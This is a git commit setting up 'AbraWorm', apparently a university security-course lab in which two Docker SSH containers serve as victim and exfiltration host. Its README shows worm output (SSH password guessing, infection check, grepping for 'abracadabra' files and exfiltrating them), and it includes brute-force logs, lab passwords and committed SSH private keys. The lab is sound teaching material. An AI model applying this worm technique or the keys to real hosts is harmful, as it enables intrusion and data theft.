init

2023-11-07 10:40:28 +01:00 · 2023-11-07 10:40:28 +01:00 · 29a172eaec
commit 29a172eaec
36 changed files with 1234 additions and 0 deletions
--- a/.gitignore
+++ b/.gitignore
@ -0,0 +1,4 @@
+.DS_Store
+*/.DS_Store
+
+worm/.venv/
--- a/.gitlab-ci.yml
+++ b/.gitlab-ci.yml
@ -0,0 +1,28 @@
+image:
+  name: docker:latest
+
+services:
+  - docker:dind
+
+variables:
+  DOCKER_HOST: tcp://docker:2375
+  DOCKER_DRIVER: overlay2
+
+stages:
+  - test_images
+
+test_images:
+  stage: test_images
+  image: docker:latest
+  script:
+    - pwd
+    - ls -la
+    - docker-compose up -d
+    - docker ps
+    - apk update
+    - apk add python3
+    - python3 -m py_compile worm/AbraWorm.py
+  artifacts:
+    paths:
+      - worm/AbraWorm.py
+      - docker-compose.yaml
--- a/README.md
+++ b/README.md
@ -0,0 +1,63 @@
+# AbraWorm
+_Corso di Sicurezza e Privatezza @ Unimi_
+
+## Passaggi per l'utilizzo
+_Testato su ubuntu_
+
+* Installazione di docker e docker-compose https://docs.docker.com/engine/install/ubuntu/
+
+* Con il comando `docker-compose up --force-recreate` vengono scaricate le immagini di openssh-server
+(immagini minimali da circa 12MB). Vengono creati 2 container di nome _openssh-server-attacker_ e
+_openssh-server-user_. Entrambi i container espongono la porta 2222 che viene rimappata sulla porta
+dell'host 22 per openssh-server-user e 12345 per openssh-server-attacker. Ora la macchina dello
+studente avrá due porte esposte 22 e 12345, si puó vedere con `netstat -tulpn | grep LISTEN`
+
+```
+teozoia@teozoia-blade:~/Desktop/abraworm/abraworm/worm$ netstat -tulpn | grep LISTEN
+tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -     
+tcp        0      0 0.0.0.0:12345           0.0.0.0:*               LISTEN      -
+...     
+```          
+
+* Come dichiarato all'interno del file _docker-compose.yaml_ al rispettivo container verrá montata la cartella
+_user/config_ e _attacker/config_; da notare che in _user/config_ é presente il file _text.txt_ il quale contiene
+la parola abracadabra.
+
+* Per testare il funzionamento dei due container é possibile collegarsi al container user con
+`ssh user@127.0.0.1` (password: password) e attacker con `ssh seed@127.0.0.1 -p 12345` (password: dees).
+
+* É possibile eseguire il worm sulla propria macchina `python3 AbraWorm.py`. Se si vuole velocizzare il processo
+é possibile togliere il `while` e fare in modo che le funzioni `get_password_list()` e `get_user_list()`
+ritornino una lista fissata non lunga. Per usare il worm in modo verboso é necessario che `DEBUG=1`.
+
+```
+teozoia@teozoia-blade:~/Desktop/abraworm/abraworm/worm$ python3 AbraWorm.py 
+user@127.0.0.1 -> adjfhfad
+Exception catched: Authentication failed.
+user@127.0.0.1 -> dhf931f
+Exception catched: Authentication failed.
+matteo@127.0.0.1 -> idhf
+Exception catched: Authentication failed.
+user@127.0.0.1 -> password
+Connected user@127.0.0.1 -> password
+[user@127.0.0.1] executing: ls
+        stdout:['AbraWorm.py\n', 'logs\n', 'ssh_host_keys\n', 'sshd.pid\n', 'test.txt\n']
+Target user@127.0.0.1 already infected
+[user@127.0.0.1] executing: grep -ls abracadabra *
+        stdout:['AbraWorm.py\n', 'test.txt\n']
+Files of interest at the target: ['AbraWorm.py', 'test.txt']
+Will now try to exfiltrate the files
+Connected to exhiltration host
+```
+
+## Docker install
+https://docs.docker.com/engine/install/ubuntu/
+
+* `sudo apt-get remove docker docker-engine docker.io containerd runc`
+* `sudo apt-get update`
+* `sudo apt-get install ca-certificates curl gnupg lsb-release`
+* `sudo mkdir -p /etc/apt/keyrings`
+* `curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo gpg --dearmor -o /etc/apt/keyrings/docker.gpg`
+* `echo "deb [arch=$(dpkg --print-architecture) signed-by=/etc/apt/keyrings/docker.gpg] https://download.docker.com/linux/ubuntu $(lsb_release -cs) stable" | sudo tee /etc/apt/sources.list.d/docker.list > /dev/null`
+* `sudo apt-get update`
+* `sudo apt-get install docker-ce docker-ce-cli containerd.io docker-compose-plugin`
--- a/attacker/config/.bash_history
+++ b/attacker/config/.bash_history
@ -0,0 +1,2 @@
+ls
+exit
--- a/attacker/config/.gitkeep
+++ b/attacker/config/.gitkeep
--- a/attacker/config/.ssh/authorized_keys
+++ b/attacker/config/.ssh/authorized_keys
--- a/attacker/config/logs/loginfo.txt
+++ b/attacker/config/logs/loginfo.txt
@ -0,0 +1 @@
+The current log file is named "current". The rotated log files are gzipped, named with a TAI64N timestamp and a ".s" extension
--- a/attacker/config/logs/openssh/current
+++ b/attacker/config/logs/openssh/current
@ -0,0 +1,23 @@
+2023-11-06 22:42:09.880207882  Server listening on 0.0.0.0 port 2222.
+2023-11-06 22:42:09.881994382  Server listening on :: port 2222.
+2023-11-06 22:42:10.940105549  kex_exchange_identification: Connection closed by remote host
+2023-11-06 22:42:10.940111716  Connection closed by 127.0.0.1 port 45942
+2023-11-06 22:45:26.231854167  Accepted password for seed from 172.18.0.1 port 61352 ssh2
+2023-11-06 22:45:26.262239876  Attempt to write login records by non-root user (aborting)
+2023-11-06 22:45:31.846185795  Attempt to write login records by non-root user (aborting)
+2023-11-06 22:45:31.847341337  Received disconnect from 172.18.0.1 port 61352:11: disconnected by user
+2023-11-06 22:45:31.847342962  Disconnected from user seed 172.18.0.1 port 61352
+2023-11-06 22:50:37.233855881  Accepted password for seed from 172.18.0.1 port 64628 ssh2
+2023-11-06 22:51:37.251898047  Received signal 15; terminating.
+2023-11-07 09:12:43.560274049  Server listening on 0.0.0.0 port 2222.
+2023-11-07 09:12:43.560420424  Server listening on :: port 2222.
+2023-11-07 09:12:44.594276967  kex_exchange_identification: Connection closed by remote host
+2023-11-07 09:12:44.596037883  Connection closed by 127.0.0.1 port 45730
+2023-11-07 09:15:28.116071792  Accepted password for seed from 172.18.0.1 port 63686 ssh2
+2023-11-07 09:18:09.807334298  Accepted password for seed from 172.18.0.1 port 56706 ssh2
+2023-11-07 09:19:40.980847923  Received signal 15; terminating.
+2023-11-07 10:26:50.142897424  Server listening on 0.0.0.0 port 2222.
+2023-11-07 10:26:50.143966716  Server listening on :: port 2222.
+2023-11-07 10:26:51.193576550  kex_exchange_identification: Connection closed by remote host
+2023-11-07 10:26:51.193582467  Connection closed by 127.0.0.1 port 51650
+2023-11-07 10:27:15.669542339  Accepted password for seed from 172.18.0.1 port 63226 ssh2
--- a/attacker/config/logs/openssh/lock
+++ b/attacker/config/logs/openssh/lock
--- a/attacker/config/logs/openssh/state
+++ b/attacker/config/logs/openssh/state
--- a/attacker/config/ssh_host_keys/ssh_host_ecdsa_key
+++ b/attacker/config/ssh_host_keys/ssh_host_ecdsa_key
@ -0,0 +1,9 @@
+-----BEGIN OPENSSH PRIVATE KEY-----
+b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAaAAAABNlY2RzYS
+1zaGEyLW5pc3RwMjU2AAAACG5pc3RwMjU2AAAAQQRY9WI38IP7LqpZj4w3gpOATSr43ajL
+DLZL8KBPyg+HUqjLg6gOTRb9lgSy5UIn6zXeVUyW2s0fF5GAgx6zVNd7AAAAuCLGBKUixg
+SlAAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFj1Yjfwg/suqlmP
+jDeCk4BNKvjdqMsMtkvwoE/KD4dSqMuDqA5NFv2WBLLlQifrNd5VTJbazR8XkYCDHrNU13
+sAAAAhALY+XXKnb6mrNV3gY1OKXPCYNLbmOBVwfTlqcCr3lf37AAAAHHJvb3RAb3BlbnNz
+aC1zZXJ2ZXItYXR0YWNrZXIBAgM=
+-----END OPENSSH PRIVATE KEY-----
--- a/attacker/config/ssh_host_keys/ssh_host_ecdsa_key.pub
+++ b/attacker/config/ssh_host_keys/ssh_host_ecdsa_key.pub
@ -0,0 +1 @@
+ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFj1Yjfwg/suqlmPjDeCk4BNKvjdqMsMtkvwoE/KD4dSqMuDqA5NFv2WBLLlQifrNd5VTJbazR8XkYCDHrNU13s= root@openssh-server-attacker
--- a/attacker/config/ssh_host_keys/ssh_host_ed25519_key
+++ b/attacker/config/ssh_host_keys/ssh_host_ed25519_key
@ -0,0 +1,7 @@
+-----BEGIN OPENSSH PRIVATE KEY-----
+b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW
+QyNTUxOQAAACAOuVKoNfSwDjmKuedxw4yR/+Ns24N0ODxqY70K8zfH/wAAAKD6rigZ+q4o
+GQAAAAtzc2gtZWQyNTUxOQAAACAOuVKoNfSwDjmKuedxw4yR/+Ns24N0ODxqY70K8zfH/w
+AAAECywErKvj8VoVo5QRNYtxud3cQkqYyda/yI0mT9de1ciA65Uqg19LAOOYq553HDjJH/
+42zbg3Q4PGpjvQrzN8f/AAAAHHJvb3RAb3BlbnNzaC1zZXJ2ZXItYXR0YWNrZXIB
+-----END OPENSSH PRIVATE KEY-----
--- a/attacker/config/ssh_host_keys/ssh_host_ed25519_key.pub
+++ b/attacker/config/ssh_host_keys/ssh_host_ed25519_key.pub
@ -0,0 +1 @@
+ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIA65Uqg19LAOOYq553HDjJH/42zbg3Q4PGpjvQrzN8f/ root@openssh-server-attacker
--- a/attacker/config/ssh_host_keys/ssh_host_rsa_key
+++ b/attacker/config/ssh_host_keys/ssh_host_rsa_key
@ -0,0 +1,38 @@
+-----BEGIN OPENSSH PRIVATE KEY-----
+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
+-----END OPENSSH PRIVATE KEY-----
--- a/attacker/config/ssh_host_keys/ssh_host_rsa_key.pub
+++ b/attacker/config/ssh_host_keys/ssh_host_rsa_key.pub
@ -0,0 +1 @@
+ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDJHsaQ6y/OHM8pmezG5Tj3MIcoDWMutJumf7vXoShepoRDO30+r4Wf0yuPIYgtAFH4LpZ5u9/obi93y9IiY7WpACoNEOWwOGUEI1+BPvQh2IQoNE1JndGf74+H7jQVd4weg7/vKYxsO1SD8ypLGO+TL1DnCH15qN9zr63tEzWC7+l06PTnJNv9rXOSI4PjyJ42rVj7GXqYfm5wFXVnGXcq8dOeoIHPWwkSwm9YriKjtykNFcu5lEpgCGqz6wfDyEnGtIZoQaTDzs6bkhzycrFXSvHxhh+LlRNDGhTgCo8Kt43M4wFIe6q+7LVUEDab6CWn+hGhixqfsG0GSGQzTM5XPg1byXbq7pocxoeKguQJZi6pGywBhl+lfEvY2riLQJwFa83xewVPaUavQ0SIc5HOrDWY/9Xor+ITyTF5hrK6kdTCc3p6MjktlWSFkHUJrnj7naDLjitKhTqcCVPuCvtoRlmtTbTN+Imbi9+Fiel2MyeFTcCSAzCPu1a+sklr/L0= root@openssh-server-attacker
--- a/attacker/config/ssh_host_keys/sshd_config
+++ b/attacker/config/ssh_host_keys/sshd_config
@ -0,0 +1,117 @@
+#	$OpenBSD: sshd_config,v 1.104 2021/07/02 05:11:21 dtucker Exp $
+
+# This is the sshd server system-wide configuration file.  See
+# sshd_config(5) for more information.
+
+# This sshd was compiled with PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
+
+# The strategy used for options in the default sshd_config shipped with
+# OpenSSH is to specify options with their default value where
+# possible, but leave them commented.  Uncommented options override the
+# default value.
+
+Port 2222
+#AddressFamily any
+#ListenAddress 0.0.0.0
+#ListenAddress ::
+
+#HostKey /etc/ssh/ssh_host_rsa_key
+#HostKey /etc/ssh/ssh_host_ecdsa_key
+#HostKey /etc/ssh/ssh_host_ed25519_key
+
+# Ciphers and keying
+#RekeyLimit default none
+
+# Logging
+#SyslogFacility AUTH
+#LogLevel INFO
+
+# Authentication:
+
+#LoginGraceTime 2m
+#PermitRootLogin prohibit-password
+#StrictModes yes
+#MaxAuthTries 6
+#MaxSessions 10
+
+#PubkeyAuthentication yes
+
+# The default is to check both .ssh/authorized_keys and .ssh/authorized_keys2
+# but this is overridden so installations will only check .ssh/authorized_keys
+AuthorizedKeysFile	.ssh/authorized_keys
+
+#AuthorizedPrincipalsFile none
+
+#AuthorizedKeysCommand none
+#AuthorizedKeysCommandUser nobody
+
+# For this to work you will also need host keys in /etc/ssh/ssh_known_hosts
+#HostbasedAuthentication no
+# Change to yes if you don't trust ~/.ssh/known_hosts for
+# HostbasedAuthentication
+#IgnoreUserKnownHosts no
+# Don't read the user's ~/.rhosts and ~/.shosts files
+#IgnoreRhosts yes
+
+# To disable tunneled clear text passwords, change to no here!
+PasswordAuthentication yes
+#PermitEmptyPasswords no
+
+# Change to no to disable s/key passwords
+#KbdInteractiveAuthentication yes
+
+# Kerberos options
+#KerberosAuthentication no
+#KerberosOrLocalPasswd yes
+#KerberosTicketCleanup yes
+#KerberosGetAFSToken no
+
+# GSSAPI options
+#GSSAPIAuthentication no
+#GSSAPICleanupCredentials yes
+
+# Set this to 'yes' to enable PAM authentication, account processing,
+# and session processing. If this is enabled, PAM authentication will
+# be allowed through the KbdInteractiveAuthentication and
+# PasswordAuthentication.  Depending on your PAM configuration,
+# PAM authentication via KbdInteractiveAuthentication may bypass
+# the setting of "PermitRootLogin prohibit-password".
+# If you just want the PAM account and session checks to run without
+# PAM authentication, then enable this but set PasswordAuthentication
+# and KbdInteractiveAuthentication to 'no'.
+#UsePAM no
+
+#AllowAgentForwarding yes
+# Feel free to re-enable these if your use case requires them.
+AllowTcpForwarding no
+GatewayPorts no
+X11Forwarding no
+#X11DisplayOffset 10
+#X11UseLocalhost yes
+#PermitTTY yes
+#PrintMotd yes
+#PrintLastLog yes
+#TCPKeepAlive yes
+#PermitUserEnvironment no
+#Compression delayed
+#ClientAliveInterval 0
+#ClientAliveCountMax 3
+#UseDNS no
+PidFile /config/sshd.pid
+#MaxStartups 10:30:100
+#PermitTunnel no
+#ChrootDirectory none
+#VersionAddendum none
+
+# no default banner path
+#Banner none
+
+# override default of no subsystems
+Subsystem	sftp	internal-sftp
+
+# Example of overriding settings on a per-user basis
+#Match User anoncvs
+#	X11Forwarding no
+#	AllowTcpForwarding no
+#	PermitTTY no
+#	ForceCommand cvs server
--- a/attacker/config/sshd.pid
+++ b/attacker/config/sshd.pid
@ -0,0 +1 @@
+164
--- a/docker-compose.yaml
+++ b/docker-compose.yaml
@ -0,0 +1,40 @@
+version: "2.1"
+services:
+  openssh-server-attacker:
+    image: lscr.io/linuxserver/openssh-server:latest
+    container_name: openssh-server-attacker
+    hostname: openssh-server-attacker
+    environment:
+      - PUID=1000
+      - PGID=1000
+      - TZ=Europe/Rome
+      - SUDO_ACCESS=false
+      - PASSWORD_ACCESS=true
+      - USER_PASSWORD=dees
+      - USER_NAME=seed
+      - PORT=22
+    volumes:
+      - ./attacker/config:/config
+    ports:
+      - "12345:2222"
+    restart: unless-stopped
+
+  openssh-server-user:
+    image: lscr.io/linuxserver/openssh-server:latest
+    container_name: openssh-server-user
+    hostname: openssh-server-user
+    environment:
+      - PUID=1000
+      - PGID=1000
+      - TZ=Europe/Rome
+      - SUDO_ACCESS=true
+      - PASSWORD_ACCESS=true
+      - USER_PASSWORD=password
+      - USER_NAME=user
+      - PORT=22
+    volumes:
+      - ./user/config:/config
+      - ./user/init-scripts:/custom-cont-init.d:ro
+    ports:
+      - "22:2222"
+    restart: unless-stopped
--- a/user/config/.bash_history
+++ b/user/config/.bash_history
@ -0,0 +1,3 @@
+ls
+cat test.txt 
+exit
--- a/user/config/.ssh/authorized_keys
+++ b/user/config/.ssh/authorized_keys
--- a/user/config/logs/loginfo.txt
+++ b/user/config/logs/loginfo.txt
@ -0,0 +1 @@
+The current log file is named "current". The rotated log files are gzipped, named with a TAI64N timestamp and a ".s" extension
--- a/user/config/logs/openssh/current
+++ b/user/config/logs/openssh/current
@ -0,0 +1,428 @@
+2023-11-06 22:42:09.909313882  Server listening on 0.0.0.0 port 2222.
+2023-11-06 22:42:09.909556590  Server listening on :: port 2222.
+2023-11-06 22:42:10.943821799  kex_exchange_identification: Connection closed by remote host
+2023-11-06 22:42:10.943824758  Connection closed by 127.0.0.1 port 45944
+2023-11-06 22:45:00.956156086  Accepted password for user from 172.18.0.1 port 55052 ssh2
+2023-11-06 22:45:00.980113919  Attempt to write login records by non-root user (aborting)
+2023-11-06 22:45:07.549622381  Attempt to write login records by non-root user (aborting)
+2023-11-06 22:45:07.551244798  Received disconnect from 172.18.0.1 port 55052:11: disconnected by user
+2023-11-06 22:45:07.551246923  Disconnected from user user 172.18.0.1 port 55052
+2023-11-06 22:47:28.575557168  Invalid user admin from 172.18.0.1 port 55098
+2023-11-06 22:47:29.632256669  Could not get shadow information for NOUSER
+2023-11-06 22:47:29.644074210  Failed password for invalid user admin from 172.18.0.1 port 55098 ssh2
+2023-11-06 22:47:29.700889169  Invalid user account from 172.18.0.1 port 56802
+2023-11-06 22:47:30.731651586  Could not get shadow information for NOUSER
+2023-11-06 22:47:30.742260336  Failed password for invalid user account from 172.18.0.1 port 56802 ssh2
+2023-11-06 22:47:30.791357503  Invalid user vagrant from 172.18.0.1 port 56804
+2023-11-06 22:47:31.819007795  Could not get shadow information for NOUSER
+2023-11-06 22:47:31.839216003  Failed password for invalid user vagrant from 172.18.0.1 port 56804 ssh2
+2023-11-06 22:47:31.890497045  Invalid user kali from 172.18.0.1 port 56806
+2023-11-06 22:47:32.925557170  Could not get shadow information for NOUSER
+2023-11-06 22:47:32.936197837  Failed password for invalid user kali from 172.18.0.1 port 56806 ssh2
+2023-11-06 22:47:34.032862379  Failed password for user from 172.18.0.1 port 56808 ssh2
+2023-11-06 22:47:34.086105088  Invalid user adaliah from 172.18.0.1 port 56810
+2023-11-06 22:47:35.111440838  Could not get shadow information for NOUSER
+2023-11-06 22:47:35.123406630  Failed password for invalid user adaliah from 172.18.0.1 port 56810 ssh2
+2023-11-06 22:47:35.176435463  Invalid user adversary from 172.18.0.1 port 56812
+2023-11-06 22:47:36.214857172  Could not get shadow information for NOUSER
+2023-11-06 22:47:36.222375714  Failed password for invalid user adversary from 172.18.0.1 port 56812 ssh2
+2023-11-06 22:47:36.280291214  Invalid user admin from 172.18.0.1 port 56814
+2023-11-06 22:47:37.316241756  Could not get shadow information for NOUSER
+2023-11-06 22:47:37.327537131  Failed password for invalid user admin from 172.18.0.1 port 56814 ssh2
+2023-11-06 22:47:37.381053006  Invalid user account from 172.18.0.1 port 56816
+2023-11-06 22:47:38.411561215  Could not get shadow information for NOUSER
+2023-11-06 22:47:38.423963423  Failed password for invalid user account from 172.18.0.1 port 56816 ssh2
+2023-11-06 22:47:38.473218465  Invalid user vagrant from 172.18.0.1 port 56818
+2023-11-06 22:47:39.511063257  Could not get shadow information for NOUSER
+2023-11-06 22:47:39.517019382  Failed password for invalid user vagrant from 172.18.0.1 port 56818 ssh2
+2023-11-06 22:47:39.559308174  Invalid user kali from 172.18.0.1 port 57166
+2023-11-06 22:47:40.589073841  Could not get shadow information for NOUSER
+2023-11-06 22:47:40.601132341  Failed password for invalid user kali from 172.18.0.1 port 57166 ssh2
+2023-11-06 22:47:41.694112425  Failed password for user from 172.18.0.1 port 57168 ssh2
+2023-11-06 22:47:41.748055216  Invalid user adaliah from 172.18.0.1 port 57170
+2023-11-06 22:47:42.773135050  Could not get shadow information for NOUSER
+2023-11-06 22:47:42.785041258  Failed password for invalid user adaliah from 172.18.0.1 port 57170 ssh2
+2023-11-06 22:47:42.831820675  Invalid user adversary from 172.18.0.1 port 57172
+2023-11-06 22:47:43.863963884  Could not get shadow information for NOUSER
+2023-11-06 22:47:43.878099967  Failed password for invalid user adversary from 172.18.0.1 port 57172 ssh2
+2023-11-06 22:47:43.938541301  Invalid user admin from 172.18.0.1 port 57174
+2023-11-06 22:47:44.975590718  Could not get shadow information for NOUSER
+2023-11-06 22:47:44.987088468  Failed password for invalid user admin from 172.18.0.1 port 57174 ssh2
+2023-11-06 22:47:45.037872718  Invalid user account from 172.18.0.1 port 57176
+2023-11-06 22:47:46.068171510  Could not get shadow information for NOUSER
+2023-11-06 22:47:46.080754760  Failed password for invalid user account from 172.18.0.1 port 57176 ssh2
+2023-11-06 22:47:46.126451093  Invalid user vagrant from 172.18.0.1 port 57178
+2023-11-06 22:47:47.154401385  Could not get shadow information for NOUSER
+2023-11-06 22:47:47.166600135  Failed password for invalid user vagrant from 172.18.0.1 port 57178 ssh2
+2023-11-06 22:47:47.173069677  beginning MaxStartups throttling
+2023-11-06 22:47:47.173077635  drop connection #17 from [172.18.0.1]:57180 on [172.18.0.2]:2222 past MaxStartups
+2023-11-06 22:47:47.213565969  Invalid user adaliah from 172.18.0.1 port 57184
+2023-11-06 22:47:48.240972178  Could not get shadow information for NOUSER
+2023-11-06 22:47:48.246550969  Failed password for invalid user adaliah from 172.18.0.1 port 57184 ssh2
+2023-11-06 22:47:48.291376469  Invalid user admin from 172.18.0.1 port 57188
+2023-11-06 22:47:49.325021845  Could not get shadow information for NOUSER
+2023-11-06 22:47:49.336594011  Failed password for invalid user admin from 172.18.0.1 port 57188 ssh2
+2023-11-06 22:47:49.383918887  Invalid user account from 172.18.0.1 port 63562
+2023-11-06 22:47:50.413350929  Could not get shadow information for NOUSER
+2023-11-06 22:47:50.426958387  Failed password for invalid user account from 172.18.0.1 port 63562 ssh2
+2023-11-06 22:47:50.485255595  Invalid user adaliah from 172.18.0.1 port 63570
+2023-11-06 22:47:51.509262388  Could not get shadow information for NOUSER
+2023-11-06 22:47:51.521046596  Failed password for invalid user adaliah from 172.18.0.1 port 63570 ssh2
+2023-11-06 22:47:51.574903304  Invalid user adversary from 172.18.0.1 port 63572
+2023-11-06 22:47:52.599938013  Could not get shadow information for NOUSER
+2023-11-06 22:47:52.611767555  Failed password for invalid user adversary from 172.18.0.1 port 63572 ssh2
+2023-11-06 22:47:52.658722930  Invalid user admin from 172.18.0.1 port 63574
+2023-11-06 22:47:53.697234680  Could not get shadow information for NOUSER
+2023-11-06 22:47:53.708034847  Failed password for invalid user admin from 172.18.0.1 port 63574 ssh2
+2023-11-06 22:47:53.758063097  Invalid user vagrant from 172.18.0.1 port 63578
+2023-11-06 22:47:54.788087833  Could not get shadow information for NOUSER
+2023-11-06 22:47:54.799692208  Failed password for invalid user vagrant from 172.18.0.1 port 63578 ssh2
+2023-11-06 22:47:54.845006666  Invalid user kali from 172.18.0.1 port 63580
+2023-11-06 22:47:55.875487917  Could not get shadow information for NOUSER
+2023-11-06 22:47:55.885755792  Failed password for invalid user kali from 172.18.0.1 port 63580 ssh2
+2023-11-06 22:47:56.974804876  Failed password for user from 172.18.0.1 port 63582 ssh2
+2023-11-06 22:47:57.026923584  Invalid user adaliah from 172.18.0.1 port 63584
+2023-11-06 22:47:58.048577710  Could not get shadow information for NOUSER
+2023-11-06 22:47:58.051859918  Failed password for invalid user adaliah from 172.18.0.1 port 63584 ssh2
+2023-11-06 22:47:58.095383168  Invalid user account from 172.18.0.1 port 63590
+2023-11-06 22:47:59.123645169  Could not get shadow information for NOUSER
+2023-11-06 22:47:59.134416919  Failed password for invalid user account from 172.18.0.1 port 63590 ssh2
+2023-11-06 22:48:00.228117502  Failed password for user from 172.18.0.1 port 57736 ssh2
+2023-11-06 22:48:00.277429961  Invalid user admin from 172.18.0.1 port 57742
+2023-11-06 22:48:01.320869045  Could not get shadow information for NOUSER
+2023-11-06 22:48:01.327795211  Failed password for invalid user admin from 172.18.0.1 port 57742 ssh2
+2023-11-06 22:48:01.374639711  Invalid user account from 172.18.0.1 port 57744
+2023-11-06 22:48:02.409012295  Could not get shadow information for NOUSER
+2023-11-06 22:48:02.423940962  Failed password for invalid user account from 172.18.0.1 port 57744 ssh2
+2023-11-06 22:48:02.476245212  Invalid user vagrant from 172.18.0.1 port 57746
+2023-11-06 22:48:03.507601212  Could not get shadow information for NOUSER
+2023-11-06 22:48:03.518392796  Failed password for invalid user vagrant from 172.18.0.1 port 57746 ssh2
+2023-11-06 22:48:03.563891254  Invalid user kali from 172.18.0.1 port 57748
+2023-11-06 22:48:04.591916046  Could not get shadow information for NOUSER
+2023-11-06 22:48:04.603218004  Failed password for invalid user kali from 172.18.0.1 port 57748 ssh2
+2023-11-06 22:48:05.692826797  Failed password for user from 172.18.0.1 port 57750 ssh2
+2023-11-06 22:48:05.741521630  Invalid user adaliah from 172.18.0.1 port 57752
+2023-11-06 22:48:06.774187797  Could not get shadow information for NOUSER
+2023-11-06 22:48:06.779352797  Failed password for invalid user adaliah from 172.18.0.1 port 57752 ssh2
+2023-11-06 22:48:06.831262672  Invalid user vagrant from 172.18.0.1 port 57760
+2023-11-06 22:48:07.862115131  Could not get shadow information for NOUSER
+2023-11-06 22:48:07.873855798  Failed password for invalid user vagrant from 172.18.0.1 port 57760 ssh2
